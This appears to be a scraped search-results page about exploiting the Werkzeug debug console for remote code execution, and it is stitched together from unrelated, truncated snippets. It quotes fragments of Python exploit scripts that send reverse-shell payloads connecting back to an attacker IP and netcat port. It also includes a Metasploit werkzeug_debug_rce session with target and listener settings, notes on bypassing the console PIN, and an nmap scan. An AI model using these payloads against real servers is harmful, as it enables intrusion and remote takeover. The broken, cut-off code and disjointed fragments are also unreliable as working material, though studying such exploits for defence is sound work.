Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · h00die [email protected] Graeme Robinson metasploit ... To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... The predictive window has collapsed. Exploitation follows disclosure in days.

January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

Security vulnerabilities and package health score for pip package werkzeug

People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.

However, if the HTTP connection ... GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode....

We cannot provide a description for this page right now

$ msfconsole -q msf > use exploit/multi/http/werkzeug_debug_rce [*] No payload configured, defaulting to python/meterpreter/reverse_tcp msf exploit(multi/http/werkzeug_debug_rce) > set RHOSTS 192.168.23.5 RHOSTS => 192.168.23.5 msf exploit(multi/http/werkzeug_debug_rce) > set LHOST 192.168.23.117 LHOST => 192.168.23.117 msf exploit(multi/http/werkzeug_debug_rce) > set VHOST 127.0.0.1 VHOST => 127.0.0.1 msf exploit(multi/http/werkzeug_debug_rce) > set MACADDRESS 02:42:ac:12:00:04 MACADDRESS => 02:42:ac:12:00:04 msf exploit(multi/http/werkzeug_debug_rce) > set MACHINEID 8d496199-a25e-4340-9c8d-2

August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....

December 4, 2022 - This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing. Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian

August 1, 2020 - Essentially what the exploit does is, it starts checking whether the debug shell is enabled or not, if it’s not it stops working, and if it is, it just sends a simple reverse shell code in python, pretty simple isn’t it ;)

February 18, 2020 - The issue here is not the Werkzeug debugger itself, but an incorrect way of configuring a Werkzeug application: making the debugger available on a production machine. A publicly exposed debugger will subject the machine to remote code execution.

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-bypass

September 30, 2021 - There is also several exploits on the internet like this or one in metasploit. In some occasions the /console endpoint is going to be protected by a pin. Here you can find how to generate this pin: https://www.daehee.com/werkzeug-console-pin-exploit/

November 8, 2021 - $ nmap --open -sV -A -p- -vv -n ... syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 8080/tcp open http syn-ack ttl 63 Werkzeug httpd 1.0.1 (Python 3.6.9) | http-methods: |_ Supported Methods: HEAD GET OPTIONS |_http-server-header: Werkzeug/1.0.1 Python/3.6.9 ...

payload = '''import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0);'''\ · '''os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close();'''%(attackerIP,port)

We cannot provide a description for this page right now

WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.

Uploaded Apr 2, 2026 Python 3 · Details for the file werkzeug-3.1.8.tar.gz. Download URL: werkzeug-3.1.8.tar.gz · Upload date: Apr 2, 2026 · Size: 875.9 kB · Tags: Source · Uploaded using Trusted Publishing? Yes · Uploaded via: twine/6.1.0 CPython/3.13.7 ·

#!/usr/bin/python3 · import requests · import sys · import re · · # lambda · _RED = '\x1b[1;31m' _BLU = '\x1b[1;34m' _GRE = '\x1b[1;32m' _RST = '\x1b[0;0;0m' success_message = lambda x: '{}[+]{} {}'.format(_GRE, _RST, x) error_message = lambda x: '{}[-]{} {}'.format(_RED, _RST, x) info_message = lambda x: '{}[*]{} {}'.format(_BLU, _RST, x) · print(info_message('Searching for the Werkzeug console ...')) ·